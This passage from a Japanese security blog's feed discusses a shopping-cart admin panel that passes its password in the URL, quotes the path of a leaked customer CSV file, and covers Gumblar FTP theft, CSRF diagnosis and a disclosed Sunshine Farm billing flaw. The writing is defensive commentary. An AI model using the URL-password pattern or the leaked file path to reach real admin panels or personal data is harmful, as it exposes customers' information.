Watch の記事には追記がありますね。</p><div class="quote-and-cite"><blockquote cite="http://internet.watch.impress.co.jp/docs/news/20100402_358712.html"><p>なお、メッセサンオーが通販サイトで導入していたショッピングカートを提供するWEBインベンターは、Googleにインデックスされないように対策した最新の管理プログラムを公開し、利用者に対して適用を呼びかけている。</p></blockquote><p class="cite">以上、<a href="http://internet.watch.impress.co.jp/docs/news/20100402_358712.html">メッセサンオー、PCゲーム通販の顧客情報がネットで流出</a> より</p></div><p>ほう、最新版を使用していなかったのが悪い……ということなのでしょうか?</p><p>その「WEBインベンター」のサイトを見ると、<a href="http://wb-i.net/spf_ex.htm">ショッピングカートCGIの紹介ページ</a> <em class="domain-info">(wb-i.net)</em>があり、サンプルが公開されています。たとえば、Contents-Mall (148,000円) のサンプルは以下のURLで見られます。</p><ul><li><a href="http://wb-i.kir.jp/sample/Contents_Mall/">http://wb-i.kir.jp/sample/Contents_Mall/</a> <em class="domain-info">(wb-i.kir.jp)</em></li></ul><p>左メニューの下の方に「管理者用」という項目があり、クリックするとログイン画面にたどり着きます。</p><p>これはサンプルなので、誰でもログインできるようにログイン画面にパスワードが書いてあります。パスワードは「1234」なので、パスワードを入力して「認証」ボタンを押します。すると管理用のメニューが出るので、適当に「会員管理」あたりを選んで右クリックし、別ウィンドウ (あるいは別タブ) で表示してみます。アドレスバーのURLはこうなります。</p><ul><li><a href="http://wb-i.kir.jp/sample/Contents_Mall/member.cgi?pass=1234">http://wb-i.kir.jp/sample/Contents_Mall/member.cgi?pass=1234</a> <em class="domain-info">(wb-i.kir.jp)</em></li></ul><p>URLの末尾に燦然と輝くpass=1234の文字。その後、適当に会員の情報を見て行くとURLは次々変わりますが、末尾には常に pass=1234 がついてまわります。また、pass=1234の部分を削ってアクセスしてみると、パスワード入力を求められる画面になります。</p><p>つまり、URLにパスワードをつけて引き回しているわけです。何らかの事情でどこかのURLを知られると、それだけで管理画面の全ての機能にアクセスされてしまいます。……これ、パスワードによる認証というより、秘密のURLによる管理に近いですね。</p><p>通常、URLは秘密情報としては扱われません。ブラウザはURLにパスワードが含まれているなんてことは知らないわけですから、普段どおりに<dfn class="glossary"><a href="../../glossary/Referer">Referer</a></dfn>を送りますし、履歴にも残します。行動履歴を取るようなツールバーを入れていれば、パスワード入りのURLが外部に送出されることにもなります。利用者にしても同じです。「この管理画面を使うときには、絶対にURLを漏らしてはならない」と言い渡されているのならともかく、そうでなければURLを慎重に取り扱うようなことはしないでしょう。ブックマークするかもしれませんし、メールで誰かに送るかもしれません。</p><p>「どうして漏れたのか?」という疑問の答えは、ほとんど明白だと思います。</p><p>そして、ベンダー(?)のWEBインベンターは、この事件を受けてこんな文書を出しています。</p><div class="quote-and-cite"><blockquote cite="http://mag.wb-i.net/2010_04_02.html"><p>さて、当社のカートを利用しているお店で個人情報流出の事故が発生しました。それは、管理プログラムがGoogleにインデックスされてしまったことによるものです。原因は調査中ですが、しかし、そのような場合でも検索エンジンに拾われないような対策を施してありますので、お知らせいたします。（問題のプログラムは2004年ごろのプログラムのようです。）</p><p class="snip"><em>(～中略～)</em></p><p>可能なら、最新のプログラムに差し替えることをお勧めいたします。少なくとも管理用のプログラムに下記のMETAタグを挿入すると良いと思います。</p><p>print "&lt;meta name='robots' content='noindex,nofollow,noarchive'&gt;\n";</p></blockquote><p class="cite">以上、<a href="http://mag.wb-i.net/2010_04_02.html">管理プログラムがGoogleにインデックスされないようにする</a> より</p></div><p>えっ、<dfn class="element"><a href="../../ref/html/element/meta">meta要素</a></dfn>の追加? そこですか? そこなんですか?</p><p>確かに、上記のようなmeta要素を入れれば、行儀の良い検索エンジンはインデックスしないようにしてくれるでしょう。ただ、それは検索エンジンにそういう動作が期待されるというだけです。行儀の悪い検索エンジンもあるかもしれませんし、そもそも、人間はmetaになんか従ってくれませんから、URLが人に知られれば管理画面にアクセスされてしまいます。</p><p>検索エンジンにインデックスされるということは、問題の本質ではないでしょう。問題は「URLが漏れると管理画面の全ての機能にアクセスされてしまう」という点です。ここを解決しない限り、安心して使うことは難しいのではないかと思うのですが……。</p><p class="note">※ここから追記:</p><p>それから、読売の記事で言及されているCSVファイルなのですが、現在は魚拓からも削除されているようです。そのURLは、"http://www.messe-sanoh.co.jp/cgi/shopweb/csv_lock/order_user.csv"というものだったようで。パスワードすら含まれていないうえに、他の秘密情報も含まれておらず、かなり推測しやすそうですね……。</p><p class="note">※ここまで追記</p><p>悩ましいのは、このアプリケーションを採用している企業がメッセサンオーだけではないという点です。利用者が指示どおりの対応をしたとして、それで大丈夫なのかというと……。この辺、どうアクションすれば良いのでしょうかね。</p><p class="note">※続き: <a href="../topic/4100">WEBインベンターがCookieを使うようになった</a></p><ul class="comment-link"><li><a href="../topic/4097/comment">「URLを知られたらアウトな管理画面」へのコメント (2件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/Web">Web</a> / <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/WEB%E3%82%A4%E3%83%B3%E3%83%99%E3%83%B3%E3%82%BF%E3%83%BC">WEBインベンター</a></span></p></div></div></content></entry><entry><title>Gumblarによる改竄発生中</title><link href="http://bakera.jp/ebi/topic/4016" /><id>tag:bakera.jp,2008:/ebi/topic/4016</id><updated>2010-01-12T15:35:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2010/1/7">2010年1月7日(木曜日)</a></h1><div class="topic"><h2><a href="../topic/4016">Gumblarによる改竄発生中</a></h2><p class="subinfo"><span class="updated">更新: 2010年1月12日15時35分頃</span></p><p>「<a href="http://internet.watch.impress.co.jp/docs/news/20100107_341003.html">GumblarによるWeb改ざん被害が相次ぐ、ユーザーも被害防止対策を</a> <em class="domain-info">(internet.watch.impress.co.jp)</em>」。結構大きな企業のサイトがやられているのが興味深いですね。各社きちんとお知らせを出していますが……。</p><div class="quote-and-cite"><blockquote cite="http://www.honda.co.jp/oshirase/"><p>原因・経緯（12月26日更新）</p><p>ストリームを担当する制作会社のパソコンが、「Gumblar（ガンブラー）」亜種により、コンピュータウィルスに感染し、パソコンの情報が第三者により盗まれ、対象サイトのファイルが改ざんされました。</p></blockquote><p class="cite">以上、<a href="http://www.honda.co.jp/oshirase/">Hondaホームページ　「ストリーム」サイトに関する報告とお詫び</a> より</p></div><div class="quote-and-cite"><blockquote cite="http://housefoods.jp/company/info/info2278.html"><p>４．原因・経緯</p><p>ハウス食品「採用ホームページ」を担当する制作会社のパソコンが、コンピューターウィルス「Gumblar（ガンブラー）亜種」に感染し、パソコンの情報が第三者により盗まれ、対象ページが改ざんされました。</p></blockquote><p class="cite">以上、<a href="http://housefoods.jp/company/info/info2278.html">ハウス食品「採用ホームページ」に関するお詫びとお知らせ（2010年1月7日）| ハウス食品からのお知らせ | 会社情報 | ハウス食品</a> より</p></div><div class="quote-and-cite"><blockquote cite="http://www.morozoff.co.jp/_cms_/news_item/detail/item00085.html"><p>■原因・経緯（2010年1月6日更新）</p><p>弊社ホームページ制作会社のパソコンが、「Gumblar亜種ウィルス」に感染したことにより、パソコンの情報が第3者により盗まれ、対象サイトのファイルが改ざんされました。</p></blockquote><p class="cite">以上、<a href="http://www.morozoff.co.jp/_cms_/news_item/detail/item00085.html">ホームページに関する報告とお詫び｜チョコレート・チーズケーキ・プリンなど洋菓子のモロゾフ</a> より</p></div><p>こぞって「制作会社のパソコンが感染」となっていますね。</p><p>それはともかく、この規模の企業がGumblarの被害で<dfn class="glossary"><a href="../../glossary/%E6%94%B9%E7%AB%84">改竄</a></dfn>されていること自体が興味深いです。GumblarはFTPのアカウント情報を盗んで攻撃者に送り、攻撃者はそのアカウントでFTP接続して改竄を実行します。私の知る限り、既知の亜種では盗まれるのはFTPのパスワードだけで、SSHのパスワードは盗まれないはずです。</p><p class="note">※……と、私は思っていますが、Gumblarにそこまで詳しくないのでイマイチ自信がありません。</p><p>ということは、以下のような状況だったということになります。</p><ul><li>Webサーバのファイル更新にFTPを使用している (SSH/SCPであればGumblarでパスワードが盗まれることはない)</li><li>社外から直接FTP接続ができる (社内限定、あるいは特殊な踏み台を経由する必要がある構成なら、攻撃者はFTPサーバにアクセスできない)</li><li>FTP接続の接続元IPアドレスを限定していない (接続元が限定されていれば、攻撃者が感染者と同じネットワークにいない限りアクセスできない)</li></ul><p>今時これは無いだろう……と思いたいところですが、まあ実際、そうでもなかったりするのですよね。</p><p>もちろん、しっかりやっている企業もあります。Webサーバのファイル更新をするのにRSAのトークンやクライアント証明書を渡されたりして、「ちょっとやりすぎじゃないの?」と思うことも少なくありません。</p><p>ただ、やっていない企業は本当にやっていなくて、本番サーバのFTPアカウント情報が送られてきて終わりという場合もあります。SSH/SCPならまだしも、本気で単なるFTPだったりするので驚きます。とはいえ、こちらから「FTPは嫌です」と言うのも変ですし、先方のポリシー的にOKなら従いますが……。</p><p>このへんは、会社による差が激しすぎると思うのですよね。</p><p class="note">※2010-01-12追記: FTPを使わないことが対策になる、と言っているわけではありませんので念のため。感染しないようにすることが重要です。</p><ul class="comment-link"><li><a href="../topic/4016/comment">「Gumblarによる改竄発生中」へのコメント (2件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a></span></p></div></div></content></entry><entry><title>CSRF対策は基本?</title><link href="http://bakera.jp/ebi/topic/3994" /><id>tag:bakera.jp,2008:/ebi/topic/3994</id><updated>2009-12-19T01:55:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2009/12/12">2009年12月12日(土曜日)</a></h1><div class="topic"><h2><a href="../topic/3994">CSRF対策は基本?</a></h2><p class="subinfo"><span class="updated">更新: 2009年12月19日1時55分頃</span></p><p>「<a href="http://www.itmedia.co.jp/news/articles/0912/11/news033.html">URL踏むと「こんにちは　こんにちは!!」　AmebaなうのCSRF脆弱性で“意図しない投稿”広がる</a> <em class="domain-info">(www.itmedia.co.jp)</em>」だそうで。</p><div class="quote-and-cite"><blockquote><p>コミュニティーサイト構築に詳しい専門家は、「CSRF対策は基本的なところ。Amebaなうが対策していなかったのは意外だ」と話している。</p></blockquote></div><p>「CSRF対策は基本的なところ」と言われると、発見も対処も容易であるような印象を受けますが、これは少し違和感がありますね。</p><p>半年ほど前の話ですが、<a href="http://www.b-architects.com">弊社</a> <em class="domain-info">(www.b-architects.com)</em>のクライアントが新規のECサイトを立ち上げるにあたって脆弱性診断をしようという話になり、外部の会社に見積もり依頼をしたことがあります。その際、業界では知らない人がいないような大手会社の診断メニューも見せていただきました。</p><p>そこで印象的だったのは、標準とされるプランにCSRFの診断が含まれていなかったことです。標準のコースには<dfn class="glossary"><a href="../../glossary/XSS">XSS</a></dfn>や<dfn class="glossary"><a href="../../glossary/SQL%E3%82%A4%E3%83%B3%E3%82%B8%E3%82%A7%E3%82%AF%E3%82%B7%E3%83%A7%E3%83%B3">SQLインジェクション</a></dfn>の診断が含まれますが、<dfn class="glossary"><a href="../../glossary/CSRF">CSRF</a></dfn>は「アドバンスド」プランの方にしか含まれていませんでした。普通のサイトではXSSやSQLインジェクションといった「基本的な」問題を検査するけれどもCSRFは検査せず、より高度なセキュリティが求められる場合に初めて検査するというプラン構成だということです。</p><p>つまり、CSRFへの対策は、大手診断会社の標準コースには含まれないような要素であるわけです。</p><p>もっとも、CSRFが標準プランに含まれないのは、これがかなり厄介な問題だからという面もあるでしょう。XSSやSQLインジェクションと比較すると、以下のような問題点があります。</p><div class="section"><h3 id="section13">修正ではなく対策が必要</h3><p>XSSやSQLインジェクションなどは単純なバグが原因で発生するものです。指摘された場合、修正の方法について議論する必要もなく、ただバグを修正すれば良いだけです (たまに、変な修正の仕方をする人もいますが……)。</p><p>それに対し、CSRFはバグが原因ではありません。設計段階から意識的にCSRFに対応する必要があり、それが抜けていたのであれば設計から再検討する必要があります。また、対策方法もいろいろあるので、どう対策して良いのかすぐには方針が決められない場合があります。</p><p class="note">※個人的には、フレームワークにCSRF対策の機能があればそれを使用し、無ければ「<a href="http://takagi-hiromitsu.jp/diary/20050427.html#p01">高木方式</a> <em class="domain-info">(takagi-hiromitsu.jp)</em>」で良いとは思うのですが……。</p></div><div class="section"><h3 id="section14">対策が必要かどうか判断が必要</h3><p>XSSやSQLインジェクションなどは、サイトのどこにあっても危険です。例外もないわけではありませんが、特殊な場合だけでしょう (たとえば、phpMyAdminのようなアプリケーションでは管理者が任意のSQLを実行できるようになっている必要があります)。ほぼ一律に脆弱性とみなせますし、一律で対応すれば良いことになります。</p><p>しかしCSRFについては、そもそもそれが脆弱性なのかどうかを判断する必要があります。第三者の用意したフォームからPOSTできるとしても、それだけでは脆弱性とはみなせません。以下のような点を考慮して検討する必要があります。</p><ul><li>副作用が生じるのかどうか。副作用がない(サーバ側の状態を一切変更しない)場合は問題ありません。たとえば、検索結果を表示したり、確認画面を表示したりするだけの動作であれば問題ないということになります。</li><li>発生する副作用が有害なものであるかどうか。たとえば、買い物かごに商品を追加する機能がCSRFで攻撃されても、決済が完了できなければ問題ないという考え方もあり得るでしょう (次に利用者が決済しようとしたときに気付くため、被害につながらない)。</li></ul></div><div class="section"><h3 id="section15">発見するのが面倒</h3><p>一般的なXSSやSQLインジェクションについては、特定の文字をフォームやURLに入れるだけで発見したり、存在を推定したりすることが可能です。そのため、「うっかり」発見されて届け出られるケースも多くなります。</p><p>それに対して、CSRFを発見するのはけっこう面倒です。ログインした後でフォームを利用してみてパラメータを見たり、パラメータを変更した状態でPOSTしてみて動作を見る必要があります。しかも、フォームのPOSTでどのような副作用が生じるのか、外部からは簡単に判断できない場合もあります。</p><p>脆弱性であるかどうかについては前述のような判断も必要になりますので、機械的なチェックが難しいという問題もあるでしょう。</p><p class="note">※余談ですが、情報セキュリティ早期警戒パートナーシップの統計ではCSRFの届出はかなり少ないようで、もはや「その他」扱いです。これは対策が進んでいるためではなく、単に「うっかり」発見されるケースが希だからなのではないかと思います。CSRFの発見にはログインが必要な上に、確認が実に面倒です。私もCSRFの届出は数件しかしていませんが、これは「うっかり」発見する確率が低いだけだと思います。</p></div><p>「基本的」と言われると簡単に対処できそうな印象を受けますが、CSRFは、他の「基本的な」脆弱性と比較すると、発見するのも対応するのも面倒です。実はけっこう厄介ですし、意識的に取り組んで行かなければならない問題だと思うのですよね。</p><p class="note">※追記: 対策しなくて良いとか、対策しないのが当然だと言っているわけではありません。むしろ「侮るべからず」ということです。注意してほしいと思うのは、発注側がCSRFへの対策を必要としている場合、要件に明確に含めないと対策が行われない可能性があるということです。</p><ul class="comment-link"><li><a href="../topic/3994/comment">「CSRF対策は基本?」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/CSRF">CSRF</a></span></p></div></div></content></entry><entry><title>サンシャイン牧場 アイテム課金</title><link href="http://bakera.jp/ebi/topic/3945" /><id>tag:bakera.jp,2008:/ebi/topic/3945</id><updated>2009-11-23T20:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2009/10/22">2009年10月22日(木曜日)</a></h1><div class="topic"><h2><a href="../topic/3945">サンシャイン牧場 アイテム課金</a></h2><p class="subinfo"><span class="updated">更新: 2009年11月23日20時0分頃</span></p><p>サンシャイン牧場ですが、アイテム課金が始まったようですね。いろいろ騒がれてもいますが、個人的には、当初からこうなるだろうとは思っていたので、課金が始まったこと自体には驚いていません。</p><p>しかし、実は大変なことになっています。詳しくは書けませんが、現時点では、サンシャイン牧場でカード情報を登録することは避けるべきです。おそらく近いうちに動きがあると思いますので、もう少し待ちましょう。</p><p class="note">※追記: とりあえず、カード番号は漏れていないようです。</p><p class="note">※2009-10-23追記: 諸々<em>お察しください。</em>とりあえず購入の機能は停止したようで、「メンテナンス中です」と表示されるようになりましたが……。</p><p class="note">※2009-10-23さらに追記: 問題の部分も停止したようです。<em>ひとまず危険はなくなりました。</em>ただ、この停止が一時的な物なのかどうか、修正されるのかどうかといった情報も入ってきていませんので、いまだ詳細を公開できる段階にはありません。完全に解決した段階で情報を公開する予定ですので、<em>今は</em>お待ちください。</p><p class="note">※2009-10-23また追記: 修正されたかも: 「<a href="../topic/3947">サンシャイン牧場の課金システムが修正されたっぽい</a>」</p><p class="note">※2009-10-31追記: さらに追加のアナウンスがありました: 「<a href="../topic/3954">サンシャイン牧場・課金システムの問題についてのアナウンス</a>」</p><p class="note">※2009-11-03追記: 読売新聞に出たようです: 「<a href="../topic/3956">サンシャイン牧場の件が全国ニュースに</a>」</p><p class="note">※2009-11-03追記: テレビのニュースでもやっていたようで : 「<a href="http://www.fnn-news.com/news/headlines/articles/CONN00165916.html">FNNニュース: 「mixi」上のゲームで利用者約4,200人分の個人情報が3日間にわたり閲覧可能な状態に</a> <em class="domain-info">(www.fnn-news.com)</em>」</p><p class="note">※2009-11-03追記: 毎日新聞にも出たようです : 「<a href="../topic/3959">本人と偽ってプログラムを操作 (サンシャイン牧場の件・毎日新聞版)</a>」</p><p class="note">※2009-11-04追記: 朝日新聞にも出たようです : 「<a href="../topic/3960">特殊な知識を持った人 (サンシャイン牧場の件・朝日新聞版)</a>」</p><p class="note">※以下、2009-11-23追記</p><p>取扱終了になりましたので、<a href="../../yomoyama/sunshinefarm">サンシャイン牧場 情報「露出」問題のまとめ</a>というページを作りました。技術的には特に面白い話でもありませんが、興味のある方は参考になさってください。</p><ul class="comment-link"><li><a href="../topic/3945/comment">「サンシャイン牧場 アイテム課金」へのコメント (8件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%B2%E3%83%BC%E3%83%A0">ゲーム</a> / <a href="../genre/%E3%82%B5%E3%83%B3%E3%82%B7%E3%83%A3%E3%82%A4%E3%83%B3%E7%89%A7%E5%A0%B4">サンシャイン牧場</a> / <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/%E6%83%85%E5%A0%B1%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3%E6%97%A9%E6%9C%9F%E8%AD%A6%E6%88%92%E3%83%91%E3%83%BC%E3%83%88%E3%83%8A%E3%83%BC%E3%82%B7%E3%83%83%E3%83%97">情報セキュリティ早期警戒パートナーシップ</a></span></p></div></div></content></entry><entry><title>MS09-065(KB969947)でDELL OPTIPLEX 740が死亡</title><link href="http://bakera.jp/ebi/topic/3966" /><id>tag:bakera.jp,2008:/ebi/topic/3966</id><updated>2009-11-13T13:40:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2009/11/11">2009年11月11日(水曜日)</a></h1><div class="topic"><h2><a href="../topic/3966">MS09-065(KB969947)でDELL OPTIPLEX 740が死亡</a></h2><p class="subinfo"><span class="updated">更新: 2009年11月13日13時40分頃</span></p><p>本日のWindows Updateに登場している<a href="http://www.microsoft.com/japan/technet/security/bulletin/MS09-065.mspx">MS09-065 (KB969947)</a> <em class="domain-info">(www.microsoft.com)</em>ですが、これをDELL OPTIPLEX 740に適用したところ、フリーズが発生。ログオン完了後にデスクトップ画面が表示されてしばらくすると、画面の一部が赤くなってフリーズし、キーボード入力も何も受け付けず、電源を強制的に切るしかなくなります。別の同機種でも再現する模様。</p><p>どうもビデオドライバ周りで死んでいるようですが、MS09-065は「Windows カーネル モード ドライバーの脆弱性により、リモートでコードが実行される」という問題を修正するものですね。おそらく、OPTIPLEX 740のドライバとの相性が悪いのでしょうね……。</p><p class="note">※以下、2009-11-12追記</p><p>他のDELLマシンでも発生しているようですね。</p><p>症状が発生した場合ですが、とりあえずセーフモードでは起動できますので、KB969947を削除することができます。参考までに、以下、Windows XPの場合の手順です。</p><ul><li>フリーズしている場合、とりあえず強制的に電源を切る(たいていの場合、電源ボタン長押し)</li><li>電源投入。起動時にF8を連打するといくつかの選択肢が出るので、「セーフモード」を選択して起動する</li><li>セーフモードで起動に成功したら、コントロールパネルから「プログラムの追加と削除」を選択、「更新プログラムの表示」にチェック</li><li>一覧に「Windows XP セキュリティ更新(KB969947)」があるはずなので、それを削除</li></ul><p>あとは再起動すると復活します。ただ、自動更新を設定している場合はシャットダウン時に勝手に適用されてしまったりするので、「更新の通知を受け取らない」ように設定した方が良いかもしれません。</p><p>ただし、この状態では深刻な脆弱性が残ったままになりますので、いつまでもこのままにしておくべきではありません。おそらくDELLかMSから何らかの対応策が出ると思いますので、それを見てしかるべき対応をする必要があります。</p><p class="note">※2009-11-12さらに追記</p><p>どうもATIの古いドライバがだめだったらしく、ドライバを最新にしてからKB969947を適用すれば良いようです (適用して30分ほど経ちますが、今のところ大丈夫)。</p><p class="note">※2009-11-13追記</p><p>マイクロソフト側でも問題を認識されたようで、以下のような話が出ています。</p><ul><li><a href="http://blogs.technet.com/jpsecurity/archive/2009/11/13/3293532.aspx">Microsoft Updateの後にWindows XPが起動しない？？</a> <em class="domain-info">(blogs.technet.com)</em></li></ul><p>英語版のKBに"Known issues with this security update"という項が追加されています。</p><div class="quote-and-cite" xml:lang="en"><blockquote cite="http://support.microsoft.com/kb/969947/en-us"><p>Known issues with this security update</p><p>After you install this security update on a computer that is running Windows XP and that is using an ATI Radeon HD 2400 series video adapter, you may find that the computer does not start correctly. To resolve this issue, follow these steps:</p></blockquote><p class="cite">以上、<a href="http://support.microsoft.com/kb/969947/en-us">MS09-065: Vulnerabilities in Windows kernel-mode drivers could allow remote code execution</a> より</p></div><ul class="comment-link"><li><a href="../topic/3966/comment">「MS09-065(KB969947)でDELL OPTIPLEX 740が死亡」へのコメント (7件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/Microsoft">Microsoft</a> / <a href="../genre/Windows">Windows</a> / <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/%E5%A4%B1%E6%95%97%E8%AB%87">失敗談</a></span></p></div></div></content></entry><entry><title>サンシャイン牧場・課金システムの問題についてのアナウンス</title><link href="http://bakera.jp/ebi/topic/3954" /><id>tag:bakera.jp,2008:/ebi/topic/3954</id><updated>2009-11-05T14:11:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2009/10/31">2009年10月31日(土曜日)</a></h1><div class="topic"><h2><a href="../topic/3954">サンシャイン牧場・課金システムの問題についてのアナウンス</a></h2><p class="subinfo"><span class="updated">更新: 2009年11月5日14時11分頃</span></p><p><a href="../topic/3945">サンシャイン牧場の件</a>ですが、mixiから「重要なお知らせ mixiアプリ「サンシャイン牧場」の不具合について」というアナウンスが出ています。例によってmixi会員でないと読めないと思いますが……。</p><p>長いですが引用しておきます。</p><div class="quote-and-cite"><blockquote cite="http://mixi.jp/release_info.pl?mode=item&amp;id=867"><p>mixi運営事務局です。</p><p>Rekoo社が提供するmixiアプリ「サンシャイン牧場」の課金サービスに関して、一部のユーザー様より不具合に関するお問い合わせを頂戴しておりますので、お知らせいたします。</p><p>Rekoo社に確認しましたところ、Rekoo社が提供している課金サービスに不具合があり、誤課金等の事象が発生したことを確認いたしましたため、当社は、Rekoo社に対して、不具合の原因の究明及び対策の実施を要請いたしました。</p><p>現在、課金サービスに関する不具合は解消されております。</p><p>本不具合に関する詳細な経緯、状況につきましては、下記のRekoo社からの説明をご確認下さいますようお願いいたします。</p><ul><li>Rekoo社の説明ページ<br />※Rekoo社のプロフィールページへリンクします。</li></ul><p>また、当該アプリケーションをご利用のユーザー様で誤課金等に心当たりがある方は、Rekoo社にご連絡いただけますようお願いいたします。</p><p>なお、当社といたしましては、多くのユーザーの皆様がご利用いただいているアプリケーションにおいて、誤課金等のトラブルがあったことについて、重く受け止めております。</p><p>提供者が外部の課金システムを利用する場合の監視・チェックを強化するとともに、当社が公式に提供する課金システムの導入を急ぐことで、ユーザーの皆様が、より安心してmixiアプリご利用いただける環境を用意するべく尽力して参ります。</p></blockquote><p class="cite">以上、<a href="http://mixi.jp/release_info.pl?mode=item&amp;id=867">[mixi] 運営者からのお知らせ mixiアプリ「サンシャイン牧場」の不具合について</a> より</p></div><p>このお知らせから「Rekooさん」のプロフィールページにリンクしており、自己紹介欄にアナウンスが出ています。また、サンシャイン牧場公式コミュニティにも「課金サービス開始時の不具合について」と題して同様のアナウンスが出ています。</p><p class="note">※自己紹介に書いてあるのは変と言えば変なのですが、こういう公式なアナウンスの仕組み自体が用意されていないのでしょう。もっと言うと、課金利用後にmixiを退会した人がいることも考えられるので、mixi外からも読める形でアナウンスすることが望ましいと思いますが、これも適切な手段がないのでしょうね……。</p><p>以下、Rekooからのアナウンスを引用しておきます。</p><div class="quote-and-cite"><blockquote cite="http://mixi.jp/view_bbs.pl?id=47636748&amp;comm_id=4523467"><p>mixiアプリ「サンシャイン牧場」をいつもご利用いただき、誠にありがとうございます。</p><p>この度は、10月21日（水）より開始いたしました課金サービスの一部不具合により、一部のユーザー様にご迷惑お掛けいたしましたことを、深くお詫び申し上げます。</p><p>「サンシャイン牧場」の課金サービスを開始いたしました10月21日（水）20:30から、10月23日（金）午前中まで、課金サービスをご利用いただいた一部ユーザー様において、誤課金、ご購入いただいたKコインが追加されない、及びユーザー様のメールアドレス・電話番号が第三者より取得可能な状況であった、といった不具合が発生いたしました。</p><p>課金サービスの不具合は、現在は解消しております。</p><p>今回の不具合の経緯は以下のとおりです。</p><ul><li>10月21日（水）20:30 課金サービスを開始<br />課金決済サービスは、日本国内のクレジットカード決済代行会社を採用しております。</li><li>10月23日（金）午前 弊社サーバーの課金システムにおいて不具合があることを発見し、課金サービスを停止</li><li>10月23日（金）午後 原因の究明及び対策の実施<br />弊社及びミクシィ社と、不具合について詳細な調査を行い、原因となるあらゆる可能性についてチェックを行い、対策を施し、不具合を解消いたしました。</li><li>10月23日（金）22:00 課金サービスの再開 </li></ul><p>課金サービスの安全性が十分であることを確認したうえで、課金サービスを再開いたしました。</p><p>なお、この度の不具合の対象ユーザー様へは、以下の対応をさせていただいております。</p><ul><li>誤課金につきましては、クレジットカード決済代行会社と協力し、対象ユーザー様へ返金の手続きを進めております。</li><li>Kコインの追加漏れにつきましても、対象ユーザー様に対してKコインの追加を随時実施しております。</li></ul><p>改めまして、この度はご迷惑をお掛けいたしましたことを、深くお詫び申し上げます。</p><p>「サンシャイン牧場」に関するご意見・ご質問がございましたら、「アプリの提供者に問い合わせる」&lt;https://mixi.jp/inquiry_appli.pl?id=7157&gt;よりご連絡いただけましたら幸いに存じます。</p><p>ユーザーの皆様が安心して楽しく「サンシャイン牧場」をご利用頂けますよう努めてまいりますので、今後もご愛顧賜りますよう、お願い申し上げます。</p></blockquote><p class="cite">以上、<a href="http://mixi.jp/view_bbs.pl?id=47636748&amp;comm_id=4523467">[mixi] 「サンシャイン牧場」Rekoo | 課金サービス開始時の不具合について</a> より</p></div><p>というわけで、問題は2つあったわけですね。</p><ul><li>Kコインを購入して課金されたのに、Kコインが増えていない場合がある。あるいは、Kコインを購入したつもりがないのに、課金されている。</li><li>メールアドレス・電話番号が第三者より取得可能な状況であった。</li></ul><p>まあ、ともあれ、これで私が報告した件については一通りアナウンスされたということになりそうです。脆弱性関連情報としてはまだ取扱い中ですので、取扱い終了を待って技術的な所を公開したいと思っております。</p><p class="note">※運営者がIPAに修正完了の連絡をしてから取扱い終了となりますので、いつ終了になるのかは何とも言えません。また、技術的には大して興味深い話にはならないと思いますので、過度な期待はしない方が良いと思います。</p><p class="note">※以下、2009-11-03追記</p><p>「原因の究明及び対策の実施」の部分に文章が追加されていることに気付きました。</p><div class="quote-and-cite"><blockquote><ul><li>10月23日（金）　午後 原因の究明及び対策の実施<br />
弊社及びミクシィ社と、不具合について詳細な調査を行い、原因となるあらゆる可能性についてチェックを行い、対策を施し、不具合を解消いたしました。なお今回のトラブルは弊社側のシステムに問題があったことで生じており、決済代行会社のゼロ社の決済システム自体に問題はなかったと認識しています。</li></ul></blockquote></div><p>決済代行会社側の問題ではなくRekoo側の問題であると明記されました。</p><p class="note">※どのタイミングで追記されたのかは良く分かりませんが、私が追記に気付いたのは11月3日の時点です。</p><p class="note">※2009-11-05追記: さらに追記があります :「<a href="../topic/3962">サンシャイン牧場・Rekooからのアナウンスに追記</a>」。</p><ul class="comment-link"><li><a href="../topic/3954/comment">「サンシャイン牧場・課金システムの問題についてのアナウンス」へのコメント (3件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%B2%E3%83%BC%E3%83%A0">ゲーム</a> / <a href="../genre/%E3%82%B5%E3%83%B3%E3%82%B7%E3%83%A3%E3%82%A4%E3%83%B3%E7%89%A7%E5%A0%B4">サンシャイン牧場</a> / <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a 